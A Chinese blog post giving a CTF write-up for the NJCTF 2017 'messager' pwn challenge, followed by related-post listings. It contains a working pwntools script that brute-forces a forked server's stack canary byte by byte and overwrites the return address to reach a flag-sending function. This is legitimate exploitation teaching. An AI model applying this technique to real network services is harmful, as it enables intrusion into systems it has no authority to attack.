NJCTF 2017-messager

最新推荐文章于 2023-03-30 10:07:32 发布
最新推荐文章于 2023-03-30 10:07:32 发布
阅读量1.3k 收藏 2
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/113173197
版权

先checksec
在这里插入图片描述打开了partial RELRO, canary, NX
可以自建flag, 打本地

echo "flag{Mine}" > flag

运行, 然后netstat查看端口
在这里插入图片描述port: 5555

分析main函数流程
是用socket通信, 其中有读取flag到buf的过程
在这里插入图片描述在这里插入图片描述sub_400BC6是发送flag, 所以要劫持的进程目的返回地址有了: 0x400BC6

在这里插入图片描述
利用fork的子进程与父进程同canary特性, 进行canary爆破, 拿到canary后覆盖返回地址劫持流程到send函数

from pwn import *

def brute_canary():
    global canary
    canary = '\x00'
    while len(canary) < 8:
        for x in xrange(256): # 2 ** 8
            io = remote("127.0.0.1", 5555)
            io.recv()
            io.send("A" * 104 + canary + chr(x))

            try:
                io.recv() 
                canary += chr(x)
                break
            except: continue
            finally: io.close()
    log.info("canary: 0x%s" % canary.encode('hex'))

def pwn():
    io = remote("127.0.0.1", 5555)
    io.recv()
    io.send("A" * 104 + canary + "A" * 8 + p64(0x400BC6))
    print io.recvline()

if __name__ == '__main__':
    brute_canary()
    pwn()

在这里插入图片描述

fa1c4
关注
专栏目录
NJCTF 2017 web Writeup
Bendawang's Blog
03-13 9006
NJCTF 2017 web Writeup
NJCTF2017 线上赛 web 题解 By Assassin
Assassin
03-18 7108
Login打开以后出现一个登陆页面,下面有一个注册用户的链接。 打开申请界面 看着申请的密码还有要求不知道是不是题目的关键点。 我们先申请一个账号登陆一下看看,发现是这样的 尝试申请一下admin发现已经存在了那么本题的知识点是mysql变量名在输入太长的时候会被截断!!那么我们就可以构造不是admin但是阶段后是admin的用户名payload: username=admin
NJCTF2017-pingme-wp
fa1c4的blog
02-03 900
文件下载 注意这题是无源码和二进制文件的题目(blind fmt) 运行发现是输入字符串然后回显, 输入长字符常看是否崩溃判断溢出, 输入格式化字符串查看输出判断格式化漏洞 初步判断有格式化漏洞, 且AAAA在第7个参数位置, 也可以用pwntools的fmtstr模块确认位置 from pwn import * io = process('./pingme') def exec_fmt(payload): io.sendline(payload) info = io.recv()
NJCTF-2017-web-writeup
dengzhasong7076的博客
03-15 608
记录一下这次比赛web一些有意思的题 Be Logical(450) http://218.2.197.235:23739/ 注册账号密码进去后发现大概是一个,积分可以转换为金币,然后再历史纪录里面又可以将金币转换为积分。 第一个感觉肯定这个是逻辑漏洞,感觉积分和金币之间转换的时候,可以利用多线程来跑一下。 在积分转换为金币的页面得知Sign.php,后面猜解文件泄漏为.Sign.php...
2017NJCTF get flag writeup
Aurora的博客
03-12 1158
 题目网址:http://218.2.197.235:23725/         打开题目是一个输入框,是输入文件名来搜索图片的功能。随便输入aaa跳转到了另一个页面,是一张读不出来的图片。查看源代码可看到        查了一下是基于RFC2397的一种URL格式,可以直接嵌入网页显示的一种数据显示方式。base64后面是base64编码的语句,解密一
DDCTF2019两个逆向writeup
蚁景网安学院
05-07 1577
01Confused首先参考链接 https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分...
CTF逆向-IDA Pro攻防世界Hello CTF
道阻且长,行则将至。
04-07 6166
文章目录前言Hello CTFIDA反汇编Flag值计算总结 前言 交互式反汇编器专业版(Interactive Disassembler Professional),人们常称其为 IDA Pro,或简称为 IDA。是目前最棒的一个静态反编译软件,为众多 0day 世界的成员和 ShellCode 安全分析人士不可缺少的利器!IDA Pro 是一款交互式的,可编程的,可扩展的,多处理器的,交叉 Windows 或 Linux WinCE MacOS 平台主机来分析程序, 被公认为最好的花钱可以买到的逆向工程
CTF使人变傻——3
最新发布
tas的博客
03-30 158
more。
caffeine编译问题处理
zyong2004的专栏
09-15 405
心血来潮想看一下caffine 这个高速缓存,最直接的方法是下载它的源码,并且编译它 在编译过程中用到了gradle,这个之前没有玩过,边看边编译,浪费了很多时间!!!! 出现的问题 ,我的版本是2.x 1.unable to find valid certification path to requested target 出现这个问题是因为java不信任window平台的任何证书,这个阶段可能出现在下载 gradle-6.8-rc-3-bin.zip过程中,还有可能出现在从云仓库下载依赖包的过
「抽奖赠书」CTF竞赛权威指南
漏洞战争
03-11 858
「本次图书由电子工业出版社博文视点赞助」前几天在“再聊CTF书籍”介绍过《CTF竞赛权威指南(Pwn篇)》一书,今天刚好从出版社那边要到5本书,全送大家。下次有机会的话,我争取搞几本其它书...
NJCTF writeup
Ni9htMar3的博客
03-27 5360
WEBLogin打开是一个注册与登陆界面,随便注册一个账号然后抓包,发现必须是admin账号才会给flag 这样利用长度截取 用空格空出,超出注册用户名长度,然后后面跟一个1避免被函数消掉,这样我们就成功强行修改admin的密码为自己的密码 登陆即得flagGet Flag首先按照他所说的输入,会出现图片,并且格式是base64 然后随便输入 解密后发现执行的是cat命令 这样只要构造命
XCTF echo-server
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-05 1241
此题是XCTF 3rd-NJCTF-2017的题目 今天做攻防世界的逆向题目的时候遇到了,就在此写下解题过程 在此附上题目下载地址 echo-serverr 1.查壳 使用ExeinfoPe工具查壳,可以发现是32位程序,没有壳 2.使用IDA进行反编译 使用32位的IDA打开程序 3.分析程序 题目提示"输入密钥,得到flag." 定位到main函数,并使用F5大法查看伪代码 这个程序的ma...
2017_NJCTF_Misc_easycrypto
ACdream
03-18 887
这个题讲道理应该算作Reverse中的算法题的吧,给定明文密文对求key,然后再根据key来计算flag 写个py脚本逆向一下就好 def get(ch): if ch >= '0' and ch <= '9': return ord(ch) - ord('0') else: return ord(ch) - ord('A') + 10 f = open("plain.t
pwn-messageb0x-学习笔记
小龙在线
08-27 487
messageb0x是一个32位的ELF文件,用IDA打开: F5反编译: 关键在于process_info这个函数: v1的输入字符200(0xC8)限制明显大于栈的ebp的58h,所以存在溢出漏洞。 然后Shift+F12查看字符串,看有没有特殊字符串(system),没有: 可以利用 查找libc版本和system的偏移: 攻击脚本: from pwn import * elf = ELF('./messageb0x') sh = process('./messageb0x') puts
pwntools中fmtstr的使用
fa1c4的blog
02-01 3980
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3344
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
kali安装checksec
fa1c4的blog
01-26 3324
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
自定义easyui dialog与messager样式
`.panel.window.messager-button`和`.panel.window.messager-button.l-btn`这两个类用于改变消息提示框中的按钮样式。它们的背景颜色、边框和文字颜色都进行了调整,以与对话框的风格保持一致。`.panel.window....
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值